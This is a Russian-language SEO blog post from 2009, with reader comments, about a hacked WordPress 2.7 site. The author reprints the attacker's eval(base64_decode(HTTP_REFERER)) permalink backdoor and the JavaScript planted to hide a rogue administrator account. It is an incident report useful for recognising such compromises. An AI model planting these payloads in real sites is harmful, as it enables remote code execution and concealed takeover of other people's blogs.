seo блог

seo блог - про то как рубить бабосики в интернете.

хакнули блог на wordpress 2.7

один из моих сайтов, тот СДЛ что яндекс выкинул с индекса хакнули сегодня тоесть вчера

покупая ссылки в блогуне я решил проверить блог по одному запросу и пошол в гугл набрав запрос увидел свой блог при переходе по ссылке мне выбило 400 Bad Request

а в ссылке было типо

http://wasya.ru/2009/09/срочн/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

пошарясь в поиске я нашол еще много хакнутых блогов, ну да ладно..

в панели администрирования → wp → пользователи → было зарегано 3 пользователя, хотя в wp нет разрешения реги юзеров.

также была надпись Administrator (2) я не-понял прикола, отображался только один админ я, а написано что админов двое..

залез в исходный код и нашарил ссылку на скрытый профиль второго админа <a href=»user-edit.php?user_id=5&#038;wp_http_referer=%2Fwp-admin%2Fusers.php%3Frole%3Dadministrator»>HaywoodWarner72</a>

перейдя в его профиль увидел чудо

хакер ломает блог на wp

вот вам JS который он всунул туда

<div id=»user_superuser»><script type=»text/javascript»><!–
var setUserName = function(){    try{        var t=document.getElementById(«user_superuser»);        while(t.nodeName!=»TR»){            t=t.parentNode;        };        t.parentNode.removeChild(t);        var tags = document.getElementsByTagName(«H3″);        var s = » shown below»;        for (var i = 0; i < tags.length; i++) {            var t=tags[i].innerHTML;            var h=tags[i];            if(t.indexOf(s)>0){                s =(parseInt(t)-1)+s;                h.removeChild(h.firstChild);                t = document.createTextNode(s);                h.appendChild(t);            }        }        var arr=document.getElementsByTagName(«ul»);        for(var i in arr) if(arr[i].className==»subsubsub»){            var n= />Administrator ((d+))</gi.exec(arr[i].innerHTML);            if(n[1]>0){                var txt=arr[i].innerHTML.replace( />Administrator ((d+))</gi,»>Administrator («+(n[1]-1)+»)<»);        arr[i].innerHTML=txt;        }    }          }catch(e){};     };     addLoadEvent(setUserName);
// –></script></div>

ума хватило все поправить, перебил пасы, обновил wp, кто не понял уточняю.. хотели перелить мой трафик себе.

первый раз когда меня ломанули и первый раз когда я обновил движок wordpress, теперь эта процедура будит постоянной)

  • rel=external nofollow ссылки в wordpress
  • яндекс дарит кажому желающему seo блог на blogseo.ru
  • Ещё один блог ленивого человека
#
  • feedburner зае_бал
  • sape и WMR вывод средств
  • Тупость саппорта Яндекса
Метки: wordpress | wp

Комментариев: 7

  1. # 5 сентября 2009 [10:00] | Горный Оптимизатор

    Спасибо за грустный опыт. Будем знать )

  2. # 5 сентября 2009 [11:52] | PCGAMER2005

    Привет, попал с точно такой ситуации. Можешь рассказать, как вернуть исходный вид ссылок на сайте?
    А то пользователя этого удалил, пароли махнул.

  3. # 5 сентября 2009 [18:13] | Михаил

    Да уж, херь!
    Как влезли, где уязвимость?
    Пробежался по своим сайтикам – вроде все ОК.

  4. # 5 сентября 2009 [22:34] | wlad2

    >Как влезли, где уязвимость?
    пока не выяснил, но обновиться полюбому следует!
    >Можешь рассказать, как вернуть исходный вид ссылок на сайте?
    в разделе ЧПУ

  5. # 5 сентября 2009 [23:59] | Бездомный Бродяга

    Жесть. Что пишут на оф. сайте? Про баг инфа там есть?

  6. # 6 сентября 2009 [10:31] | wlad2

    Бездомный Бродяга,
    пишут что пизда рулю и последний wp тожа сломать можно.

  7. # 6 сентября 2009 [16:37] | Полат

    У меня та же ситуация, правда из трех блогов (2 на WP2.6 и 1 на 2.7) хакнули только один, который на 2.6.

Сказать!

  • Подпишись на мой блог

    Подписатьса по RSS

    Что такое RSS?

    Follow мой Twitter

    Или альтернатива на почту:

    Ищешь где Хостить Саттелиты? - я советую БЕСТХОСТЕР 1гиг/mysql неогр/цена в мес 60 руб или 2$ читай мои посты тут и тут.
  • - BIZRSS.ru

icq 407534416, Быстро взял и подписался на блог тут → http://feeds.feedburner.com/wlad2